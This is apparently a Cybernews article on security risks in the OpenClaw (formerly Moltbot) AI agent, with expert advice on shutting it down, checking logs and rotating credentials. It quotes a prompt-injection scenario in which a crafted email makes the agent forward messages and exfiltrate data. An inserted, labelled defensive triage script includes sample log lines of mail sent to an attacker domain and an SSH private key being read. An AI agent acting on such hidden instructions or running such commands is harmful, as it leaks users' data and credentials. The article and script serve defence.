
As cybersecurity experts increasingly warn about vulnerabilities in Moltbot, an AI assistant now known as OpenClaw, here’s what users can do to prevent their data from being exposed.
- Cybersecurity experts have repeatedly warned about vulnerabilities in OpenClaw, a new open-source AI assistant previously known as Moltbot.
- Any connected tools and services, such as mailboxes, calendars, or messaging platforms, could be exposed.
- Users may want to shut down the OpenClaw service and inspect the logs of the tool and of the device it was running on.
- Third-party accounts connected to OpenClaw should also be inspected for any potential changes, like sent messages or purchased services.
An open-source AI assistant, OpenClaw, previously known as Moltbot and Clawdbot, has surged in popularity in recent weeks and is now estimated to have between 300,000 and 400,000 users, according to OX Security.
OpenClaw runs on the user’s hardware and can connect to third-party services, such as email, calendars, chat apps, and browsers. It is designed to take actions by command and can be used to automate tasks, such as sending emails or interacting with online services.
Initial enthusiasm over OpenClaw was followed by confusion after news broke that its agents had started organizing themselves on the AI-only social media network Moltbook. However, it was later revealed that humans could post content disguised as AI agents.
An investigation by cybersecurity firm Wiz released on February 2nd found that the Reddit-like platform exposed 35,000 email addresses, 1.5 million API authentication tokens, and private messages between the AI agents.
Security concerns were also raised by researchers from OX Security, who warned that OpenClaw is a vibe-coded project without guardrails that is “one step away from a massive data breach.”
Baruch Weizman, CTO and Cofounder at cybersecurity firm Cyata, says the risk lies in OpenClaw’s autonomy, as it fetches skills from the internet and executes them.
“A crafted email with hidden instructions can cause the agent to act against your interests – forwarding messages, exfiltrating data, taking actions you never authorized. No clicks, no warnings,” he says.
What data is at risk with OpenClaw?
Savva Pistolas, a technical director at cybersecurity consultancy ADAS, says everything Moltbot can access, store, or act on is at risk of exposure.
The key areas of concern are account credentials and API keys; OpenClaw's configuration files, which hold them, are an attractive target for credential-stealing malware. Any connected files, such as SSH keys, or services like mailboxes, calendars, or chat platforms, are prime targets for attacks.
Pistolas points to reports of exposed OpenClaw interfaces on Shodan, a search engine for internet-connected devices, which leaves those instances open to automated attacks.
“It isn’t a new approach to compromising developers and techies who want to host their own services, but end up helping bad actors leapfrog into enterprise network environments,” Pistolas tells Cybernews.
Peter Steinberger, the creator of OpenClaw, acknowledged the security risks of what he called “a free, open source hobby project.” In his statement to CNBC, Steinberger said he doesn’t yet recommend the agent to non-technical users.
How do I prevent OpenClaw from exposing my data?
Aras Nazarovas, an information security researcher at Cybernews, recommends OpenClaw users who worry about their data being exposed take the following steps:
- Immediately shut down the OpenClaw service. Inspect the logs of the tool and the system logs of the device on which the tool was running to detect any suspicious activity.
- Inspect third-party accounts connected to the tool and look for any potential changes, such as sent messages, updated account settings, changed billing details, or purchased services.
- If you find anything suspicious, change account authentication details, such as passwords and API keys.
- If you find anything suspicious in system logs, identify whether the device stored any sensitive data, change any associated authentication details, and reinstall the OS on the affected device.
“If you wish to continue using the tool in the future, ensure that you are running it in an isolated environment, with restricted access controls, such as local network connectivity only or an IP whitelist, as well as a strong password or auth token,” Nazarovas says.
He adds that users should run OpenClaw with the lowest possible privileges and actively monitor the tool’s activity logs and changes in future releases.
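The triage steps above, as an added example that is not part of the article or of the OpenClaw project: a script to run against a copy of the agent's activity log once the service has been stopped. It lists every action that changed something outside the host (so you know which connected accounts to inspect), which accounts and secrets to rotate, whether commands ran on the host (the reinstall case), and whether a secrets file or the web interface's bind address is more exposed than it should be. The JSON-lines log format, the tool names, the field names, and the sample log are all hypothetical assumptions made for the example.

```python
# Added example, not OpenClaw code. The log format, tool names and fields
# below are assumptions; adapt them to whatever the tool actually writes.
import ipaddress
import json
import os
import stat

# Tools whose invocation changes state outside the host, mapped to the kind
# of connected account that must be inspected (sent mail, posts, purchases).
SIDE_EFFECT_TOOLS = {
    "email.send": "mailbox",
    "calendar.create": "calendar",
    "chat.post": "messaging",
    "browser.submit": "browser",
    "http.post": "network",
    "shell.exec": "host",
}
# Substrings in tool arguments that suggest a secret was read or touched.
SECRET_HINTS = (".ssh", ".env", "token", "credentials", "api_key")

# Constructed sample log (JSON lines). The fourth line is deliberately truncated.
SAMPLE_LOG = """\
{"ts":"2026-02-03T09:12:01Z","tool":"email.read","account":"alice@example.com","args":{"folder":"INBOX"}}
{"ts":"2026-02-03T09:12:07Z","tool":"email.send","account":"alice@example.com","args":{"to":"drop@attacker.example","subject":"fwd: Q1 contracts"}}
{"ts":"2026-02-03T09:12:09Z","tool":"shell.exec","account":null,"args":{"cmd":"cat ~/.ssh/id_ed25519"}}
{"ts":"2026-02-03T09:13:00Z","tool":"calendar.read","ac
{"ts":"2026-02-03T09:15:22Z","tool":"http.post","account":null,"args":{"url":"https://paste.example/api","bytes":2048}}
{"ts":"2026-02-03T09:16:00Z","tool":"chat.post","account":"alice#4242","args":{"channel":"#general","text":"hi"}}
"""


def parse_log(text):
    """Parse JSON lines; malformed lines are counted rather than silently dropped."""
    events, malformed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            malformed += 1
    return events, malformed


def triage(events, trusted_domains):
    """Turn the event stream into a list of things to inspect and rotate."""
    report = {
        "side_effects": [],           # (ts, tool, category, account)
        "accounts_to_rotate": set(),  # connected accounts the agent acted on
        "external_recipients": set(), # recipient domains outside your own
        "secret_access": [],          # (ts, tool, args) that touched a secret
        "host_compromised": False,    # commands ran on the host: reinstall
    }
    for ev in events:
        tool = ev.get("tool", "")
        args = ev.get("args") or {}
        account = ev.get("account")
        if tool in SIDE_EFFECT_TOOLS:
            report["side_effects"].append((ev.get("ts"), tool, SIDE_EFFECT_TOOLS[tool], account))
            if account:
                report["accounts_to_rotate"].add(account)
            if tool == "shell.exec":
                report["host_compromised"] = True
        recipient = args.get("to")
        if recipient:
            domain = recipient.rsplit("@", 1)[-1].lower()
            if domain not in trusted_domains:
                report["external_recipients"].add(domain)
        if any(hint in json.dumps(args).lower() for hint in SECRET_HINTS):
            report["secret_access"].append((ev.get("ts"), tool, args))
    return report


def triage_sample():
    """Run the triage over the constructed sample log."""
    events, _ = parse_log(SAMPLE_LOG)
    return triage(events, trusted_domains={"example.com"})


def perms_too_open(mode):
    """True if a secrets/config file grants any access to group or others."""
    return bool(stat.S_IMODE(mode) & (stat.S_IRWXG | stat.S_IRWXO))


def secrets_file_exposed(path):
    return perms_too_open(os.stat(path).st_mode)


def listener_exposed(bind_addr):
    """True unless the agent's web interface is bound to a loopback address."""
    if bind_addr == "localhost":
        return False
    try:
        return not ipaddress.ip_address(bind_addr).is_loopback  # 0.0.0.0, :: -> exposed
    except ValueError:
        return True  # "*" or a hostname: treat as exposed


if __name__ == "__main__":
    events, bad = parse_log(SAMPLE_LOG)
    rep = triage(events, trusted_domains={"example.com"})
    print(f"{len(events)} events parsed, {bad} malformed line(s)")
    for ts, tool, category, account in rep["side_effects"]:
        print(f"{ts} {tool:<16} inspect {category} for {account or 'n/a'}")
    print("rotate:", sorted(rep["accounts_to_rotate"]))
    print("external recipients:", sorted(rep["external_recipients"]))
    print("secret access:", rep["secret_access"])
    print("reinstall host:", rep["host_compromised"])
    print("web UI exposed:", listener_exposed("0.0.0.0"))
```

The side-effect list is what to take to each connected account: a mailbox entry means checking the sent folder, a messaging entry means checking posted messages, and a network entry with an external recipient domain is a likely exfiltration path. A `shell.exec` event is the case the last step above covers, since anything the agent could read on the host (SSH keys, config files) should be treated as taken, which is why the report also flags secret access and recommends a reinstall.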
Collin Spears, a senior director of product management at Black Duck Software, says the Moltbot case teaches a clear lesson.
He tells Cybernews, “Any AI tool that can read your email and execute commands on your behalf needs the same caution you’d give to a stranger asking for your house keys. If the tool doesn’t explain exactly what it can access and who else might see it, don’t install it.”
Eglė Krištopaitytė is a journalist at Cybernews, focusing on topics related to AI regulation and the technology’s impact across societies, industries, and everyday lives. Before joining Cybernews, Eglė covered international politics and health in various media outlets for nearly eight years. She holds a Bachelor’s degree in Linguistics from Vilnius University, where she also worked as a science communications officer. At Cybernews, Eglė aims to look beyond the AI hype and educate readers about the potential benefits and risks of this emerging technology.